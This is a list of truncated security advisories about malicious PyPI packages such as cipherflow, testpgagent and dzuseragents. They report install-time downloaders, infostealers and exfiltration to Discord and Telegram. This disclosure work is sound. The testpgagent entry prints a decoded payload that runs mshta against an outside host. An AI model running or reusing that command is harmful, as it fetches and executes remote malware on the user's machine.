Malicious code in temp-development-package-test (PyPI)
--- -= Per source details. Do not edit below this line.=- Source: kam193 5cdc1d94dd0cfb62a4a0267ae52bf1a72dfa31a6854196b4bb220759b7c6e878 Starting with version 0.4, package installs a sitecustomize.py that executes during Python engine initialization. The embedded code uses mshta to download...
MAL-2026-5839 Malicious code in cipherflow (PyPI)
--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 281ede3c5b3181c2df22a4b32a01453a51ac389a1dfe8bde69d53821cbaf20d4 cipherflow advertises itself as a zero-dependency pure-Python AES/DES library, but cipherflow/environ.py contains a multi-layer-obfuscated payload th...
Malicious code in testpgagent (PyPI)
--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector c3b12f57a72964e978d195ad7c3a9f6fe560ad1990d55bb1b4053d88a6bb9c4f On pip install, setup.py line 19 calls exec(base64.b64decode(...)) whose decoded body is import os; os.system('cmd /c "mshta http://fixars.top"'). This...
MAL-2026-4835 Malicious code in rogiant-install (PyPI)
--- -= Per source details. Do not edit below this line.=- Source: kam193 0c659d6e1e7b9bbbbb7b808196db4231a5eb1a62fe91827fc02fd708b92728b5 During installation package downloads and runs a malicious executable. Likely continuation of 2026-03-rowrap. The campaign is built over a malicious Roblox API...
MAL-2026-4810 Malicious code in binproto (PyPI)
--- -= Per source details. Do not edit below this line.=- Source: kam193 72de81f36a15d75d302ca94b378c3e5025b6d0cb2d24360d06527130ed053ebd When using the provided functionality, the code silently downloads and executes a malicious executable. --- Category: MALICIOUS - The campaign has clearly...
Malicious code in robase-fast-install (PyPI)
--- -= Per source details. Do not edit below this line.=- Source: kam193 eb36bd6222d998fae305e6200dff6413fec375765d7b81876e8041b72101c7ef During installation package downloads and runs a malicious executable. Likely continuation of 2026-03-rowrap. The campaign is built over a malicious Roblox API...
Malicious code in databasetapes (PyPI)
--- -= Per source details. Do not edit below this line.=- Source: kam193 d859d21aa59dfad2efc5c2f98253cd1cc808621fb3b7525037c104324e27dfe8 During installation package downloads and runs a malicious executable. Likely continuation of 2026-03-rowrap. The campaign is built over a malicious Roblox API...
MAL-2026-927 Malicious code in polyclawd (PyPI)
--- -= Per source details. Do not edit below this line.=- Source: kam193 1f994af0e1b17c0d30e950a5aef9a45d8e34f6f59ab45fadddb05b340ed5cdad The package is prepared to download a hardcoded executable and save it in %LOCALAPPDATA% under a very generic name, clearly aiming to hide its existence. Code ...
MAL-2026-909 Malicious code in clawdist (PyPI)
--- -= Per source details. Do not edit below this line.=- Source: kam193 3008887b6c2929530cd48dc996c91d70eb92432465d02f4ff28e6d5927350097 The package is prepared to download a hardcoded executable and save it in %LOCALAPPDATA% under a very generic name, clearly aiming to hide its existence. Code ...
Malicious code in dzuseragents (PyPI)
--- -= Per source details. Do not edit below this line.=- Source: kam193 f0be670ad8e17f42129943a744559ebb8818c581bc637c1469cf8553b7b8f8c9 The package downloads an executable and adds it to autostart. The downloaded application then periodically creates a screenshot and sends it to a Discord...
MAL-2026-899 Malicious code in dzuseragents (PyPI)
--- -= Per source details. Do not edit below this line.=- Source: kam193 f0be670ad8e17f42129943a744559ebb8818c581bc637c1469cf8553b7b8f8c9 The package downloads an executable and adds it to autostart. The downloaded application then periodically creates a screenshot and sends it to a Discord...
Malicious code in magichat (PyPI)
--- -= Per source details. Do not edit below this line.=- Source: kam193 b999f3f5762dc9bcb0dc2e91ef10116a368aca535d2f07fa2519e8d64bbc0902 The package is prepared to download a hardcoded executable and save it in %LOCALAPPDATA% under a very generic name, clearly aiming to hide its existence. Code ...
MAL-2026-843 Malicious code in requests-core-plugin (PyPI)
--- -= Per source details. Do not edit below this line.=- Source: kam193 f7d809caa4cb4961377b3c02a06f90ce19136a36297191248a8c6cd289a809f2 During installation, package loads obfuscated code that then downloads and starts an executable. The final executable is identified as malware and appears to...
Malicious code in saintone (PyPI)
--- -= Per source details. Do not edit below this line.=- Source: kam193 d762a42d55901a472c7070197cef989428ecb0140acfe02c72d719d74b430436 Code downloads and starts an executable widely recognized as malware, then sends some results to a Telegram webhook. --- Category: MALICIOUS - The campaign has...
MAL-2025-191862 Malicious code in saintone (PyPI)
--- -= Per source details. Do not edit below this line.=- Source: kam193 d762a42d55901a472c7070197cef989428ecb0140acfe02c72d719d74b430436 Code downloads and starts an executable widely recognized as malware, then sends some results to a Telegram webhook. --- Category: MALICIOUS - The campaign has...
Malicious code in selenium-stealth-utils (PyPI)
--- -= Per source details. Do not edit below this line.=- Source: kam193 b7721bb039c55a43bd1dc81dfad14494df158912f9dda006a67881ce54be64d3 During importing, a malicious executable is being downloaded and started. According to sandbox report, the executable is an infostealer of rhadamanthys family...
Malicious code in svcmanager (PyPI)
--- -= Per source details. Do not edit below this line.=- Source: kam193 062d589e7c49394864a13694f3de2a89589fd2f5e6a4d2e43e35ce136b6e7e9c Package attempts to download an executable and install it as a privileged service. The executable seems to be a modified remote access tool --- Category: MALICIO...